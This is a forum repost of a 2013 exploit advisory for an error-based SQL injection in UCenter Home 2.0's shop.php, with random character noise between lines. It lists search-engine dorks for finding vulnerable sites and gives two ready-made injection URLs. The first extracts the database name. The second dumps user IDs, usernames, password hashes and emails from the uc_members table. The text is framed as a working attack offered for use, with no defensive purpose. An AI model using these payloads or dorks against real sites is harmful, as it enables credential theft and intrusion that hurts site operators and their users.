中国网络渗透测试联盟
标题:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
[打印本页]
作者:
admin
时间:
2013-2-27 21:31
标题:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
, Y! G4 j; C K- q
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
- I8 P9 `6 A& y) x
" I6 e; B% U" `9 N* C1 n
( e1 b& _: T8 g$ l1 N
: v$ I- l1 M/ s- |
*/ Author : KnocKout
" ~; r0 X" R2 W; a3 h; `! k
; x% q$ Q* m6 ^+ C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
0 o7 u. M% j1 a2 b/ ~
2 P5 Z+ o3 x) s" V9 B9 C5 W7 K
*/ Contact:
knockoutr@msn.com
3 E, }% ?0 `/ l# I3 k$ X
) a$ l7 D" a' ?& v% T0 N+ n
*/ Cyber-Warrior.org/CWKnocKout
" Q; r$ y+ M9 A& z: K
1 _" [0 ~/ n% S! _- l& p0 w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 V( s6 ]/ e% T
0 t. m. ? {; U+ c+ E
Script : UCenter Home
0 f& ^2 O2 l$ b
7 ~! A' {6 i- w: O
Version : 2.0
- l7 a5 \5 S# x) |2 |; ~/ C# \
: h! B+ G6 i: v1 J8 I6 Z$ K
Script HomePage :
http://u.discuz.net/
: E( o- [- `! t0 M) P6 ~# S! W
6 |& I3 D5 n7 w+ R$ S; U
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) X) ~( K/ T, \( S
3 Z- f* ?2 W; Y$ B' T$ q
Dork : Powered by UCenter inurl:shop.php?ac=view
0 }" y" D8 g) }( _
7 c n H7 M0 P
Dork 2 : inurl:shop.php?ac=view&shopid=
9 T9 c( F) D; w- w1 p
/ ~ S; t0 k2 y/ P, [
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
* T4 V7 g6 M9 f# A! b" d2 G
% ?+ F. x8 Q4 \8 ]+ y
Vuln file : Shop.php
+ ~% `. q) K7 A/ V, S
, r- q/ E) \! r9 a Q
value's : (?)ac=view&shopid=
# Q& P% v$ h4 [# L. s
3 g0 K- @$ q" x5 c/ O1 d- X
Vulnerable Style : SQL Injection (MySQL Error Based)
! _6 ^' W' M3 m# C$ Q0 V1 w- C
8 l* s! Z1 d5 {' s1 D
Need Metarials : Hex Conversion
" D7 G- C2 ^/ c
# F. `. N- p6 l8 a
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, F& H9 N- m! c V2 ]
8 \8 s" S4 Z* K% f# E2 T4 Z
Your Need victim Database name.
x! r3 S/ j2 [/ q
+ a1 r# [/ R* T2 k
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2 C( T% t* L" ^
J+ c, |: |' [' N2 J; u
..
- ~7 v# w) q# Y
5 K* b @; q* G {
DB : Okey.
. ^' n( y8 w6 R6 ^5 ?8 r' p
/ y) T6 ?1 R: w _: G& K
your edit DB `[TARGET DB NAME]`
6 Y. W$ T5 B1 w6 p) T: V$ z" G( \
4 T" b8 D/ Y% T p8 E
Example : 'hiwir1_ucenter'
8 b# d/ W5 B! c0 [8 n
! p. ~9 v% U8 k n3 r
Edit : Okey.
5 X- j6 @' J# h" |8 i1 S
5 l' ?1 s/ O. I& Z0 Z
Your use Hex conversion. And edit Your SQL Injection Exploit..
6 \" G- {! X+ y& H
& w; h5 x# |$ e. @
. i4 q R0 g1 }' s4 E# m
7 k( c& p+ Y3 I$ z- L* c2 c
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
( H4 p; t9 m* B1 D
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2